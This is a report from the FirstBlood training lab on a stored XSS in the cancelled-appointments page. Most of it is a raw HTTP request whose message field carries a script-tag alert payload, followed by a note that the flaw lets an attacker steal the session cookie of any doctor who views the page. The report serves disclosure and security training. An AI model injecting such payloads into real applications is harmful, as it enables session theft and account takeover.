FirstBlood-#533 — Stored XSS on /cancelled.php
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-26, 0x1452 Level 3 reported:
I found a stored XSS on
/cancelled.php, caused by the unsanitized appointment
messagethat gets reflected on the page.
To reproduce this you first need to cancel any of your appointments with a malicious
POST /api/ma.php HTTP/1.1 Host: b6a5124dc2a4-0x1452.a.firstbloodhackers.com Cookie: drps=10f43143cf094d9363fc08ee7 Content-Length: 102 Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99" Csrf: 99215d4e-0ff3-4275 X-Site-Req: permitted Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Content-Type: application/x-www-form-urlencoded Accept: */* Origin: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com/manageappointment.php?success&aptid=1f53ee02-c444-4104-8adf-19590b043cbe Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close act=cancel&id=1f53ee02-c444-4104-8adf-19590b043cbe&message=yo"><script>alert(document.domain)</script>
When a logged in doctor now navigates to
/drpanel/cancelled.php, the XSS will fire:
This was reported in the previous version and previously required some filter bypasses. In this version there isn't any filtering in place at all.
An attacker can cancel their appointment with a malicious message, allowing them to steal the session cookie of any doctor that visits the Cancelled Appointments page.
FirstBlood ID: 22
Vulnerability Type: Stored XSS